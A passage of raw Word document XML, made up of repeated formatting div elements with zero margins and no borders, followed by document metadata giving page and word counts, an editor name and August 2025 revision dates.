      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="776750450">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="976958713">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1055810436">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1289555339">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="164300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372B-5930-4A32-98C9-9236FA0E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28</Pages>
  <Words>8926</Words>
  <Characters>50884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dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Harshil</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-04T14:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-08T14:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>